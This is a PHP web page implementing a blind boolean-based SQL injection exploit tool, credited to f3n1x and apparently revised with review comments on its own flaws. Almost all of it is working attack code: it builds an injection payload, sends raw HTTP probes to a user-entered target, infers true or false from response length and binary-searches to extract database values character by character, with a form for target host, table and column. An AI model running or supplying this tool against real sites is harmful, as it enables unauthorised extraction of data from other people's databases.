Blind SQL Injection Exploit Tool
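<html>
<head><title>Blind SQL Injection Exploit</title></head>
<body><center>
<?php
// Blind (boolean-based) SQL injection exploit: recovers one SELECT result
// byte by byte by comparing the size of the target's HTTP response for a
// TRUE probe against a FALSE probe. Originally coded by f3n1x; works with
// MSSQL and MySQL.
//
// NOTE (review): this page is itself an attack tool. Anyone who can reach it
// can make *this* server open a TCP connection to an arbitrary host and send
// the injection payload, i.e. it is an open SSRF/scanner endpoint. Keep it
// off public hosts, restrict access to it, and only point it at systems you
// are authorised to test.

set_time_limit(300);

// Returns the named POST field as a string, or '' when it is absent.
// Replaces the original extract($_POST), which let any POST key overwrite
// any local variable of the function that called it ($port, $socket, $req...).
function bsqli_param($name) {
    return isset($_POST[$name]) ? (string) $_POST[$name] : '';
}

// Sends one boolean probe to the target and classifies the answer.
//
//   $j    1-based position of the character being tested
//   $exp  SQL comparison operator, "=" or ">"
//   $asc  ASCII value the character at position $j is compared against
//
// Returns true when the response size falls in the TRUE window, false when
// it falls in the FALSE window, and null when it matches neither (connection
// failure, or the windows are not tuned to the target yet). Callers must
// treat null as "cannot decide", not as false.
function sockr($j, $exp, $asc) {
    $host   = bsqli_param('host');
    $path   = bsqli_param('path');
    $result = bsqli_param('result');
    $table  = bsqli_param('table');
    $col    = bsqli_param('col');
    $val    = bsqli_param('val');
    $port   = 80;

    // Make sure $inj matches the blind injection syntax on your site; if it
    // does not, modify it. If the server does not allow the ' character,
    // replace %27$val%27 with the SQL char() function and the ASCII values
    // of $val.
    $inj = "%20and%20ascii(substring((select%20$result%20from%20$table%20where%20$col=%27$val%27),$j,1))$exp"
         . (int) $asc . "--";

    $socket = @fsockopen($host, $port, $errno, $errstr);
    if ($socket === false) {
        // The original called fwrite() on false here and fell through to an
        // implicit null; make the "undecidable" result explicit instead.
        return null;
    }

    // No space between "HTTP/1.1" and CRLF: the original sent "HTTP/1.1 \r\n",
    // which some servers reject as a malformed request line.
    $req  = "GET /$path$inj HTTP/1.1\r\n";
    $req .= "Host: $host\r\n";
    $req .= "Connection: Close\r\n\r\n";
    fwrite($socket, $req);

    $res = '';
    while (!feof($socket)) {
        $res .= fgets($socket, 512);
    }
    fclose($socket);

    // Classify by response length. Replace the two windows below with the
    // sizes you observe for a known-TRUE and a known-FALSE probe on your
    // target before running the extraction.
    $ansl = strlen($res);
    if ($ansl > 50000 && $ansl < 60000) {
        return true;   // TRUE window
    }
    if ($ansl > 36000 && $ansl < 40000) {
        return false;  // FALSE window
    }
    return null;       // neither window matched: undecidable
}

// Finds the length of the selected value by probing
// ascii(substring(value, i, 1)) > 0 for i = 1, 2, ... until a probe stops
// answering TRUE.
//
// Returns the number of consecutive TRUE probes, i.e. 0 when the very first
// probe is not TRUE (the caller reports that as "wrong condition"). Bounded
// by $max so an always-TRUE condition (mis-tuned windows, broken injection
// syntax) cannot spin until the script time limit.
function getLength() {
    $max = 256;  // upper bound on the extracted length; raise if you expect longer values
    $i = 1;
    while ($i <= $max && sockr($i, ">", 0) === true) {
        $i++;
    }
    return $i - 1;
}

// Recovers $length characters, one at a time, by binary search over the
// ASCII range [32, 128) using "=" and ">" probes against the target.
//
// Returns the recovered string. A character that cannot be resolved — it is
// outside 32..127, or a probe returned null — is emitted as '?' so the loop
// terminates; the original kept re-probing the same midpoint forever in that
// case.
function getValue($length) {
    $v = '';
    for ($a = 1; $a <= $length; $a++) {
        $bl   = 32;   // lower bound of the search window
        $bh   = 128;  // exclusive upper bound of the search window
        $ch   = null;
        $prev = -1;   // midpoint tested on the previous iteration
        while (true) {
            $b = intval(($bl + $bh) / 2);
            if ($b === $prev) {
                // The midpoint stopped moving: the value lies outside the
                // window (or probes are undecidable). Give up on this byte.
                break;
            }
            $prev = $b;
            if (sockr($a, "=", $b) === true) {
                $ch = chr($b);
                break;
            }
            if (sockr($a, ">", $b) === true) {
                $bl = $b;
            } else {
                $bh = $b;
            }
        }
        $v .= ($ch === null) ? '?' : $ch;
    }
    return $v;
}

if (isset($_POST['host'])) {
    $length = getLength();
    if ($length > 0) {
        // The recovered value comes from the target; escape it before
        // putting it in this page.
        echo htmlspecialchars(getValue($length), ENT_QUOTES, 'UTF-8');
    } else {
        echo "wrong condition";
    }
}

// Re-populates a form field from the last submission. Escaped, because the
// original echoed the raw POST values into value="..." attributes (reflected
// XSS against whoever uses this page).
function bsqli_field($name) {
    return htmlspecialchars(bsqli_param($name), ENT_QUOTES, 'UTF-8');
}
?>
<br><br>
<form method="post">
<!-- Wherever you need a space inside a field, use the URL encoding %20 -->
Host: <input type="text" name="host" value="<?php echo bsqli_field('host'); ?>">ex: www.example.com<br>
Path: /<input type="text" name="path" value="<?php echo bsqli_field('path'); ?>">ex: forum/bugged.asp?id=3<br>
SELECT <input type="text" name="result" value="<?php echo bsqli_field('result'); ?>">
FROM <input type="text" name="table" value="<?php echo bsqli_field('table'); ?>">
WHERE <input type="text" name="col" value="<?php echo bsqli_field('col'); ?>">='<input type="text" name="val" value="<?php echo bsqli_field('val'); ?>">'
<input type="submit" value="Inject" onclick="this.value='Please Wait...';this.disabled=true">
</form>
</center></body></html>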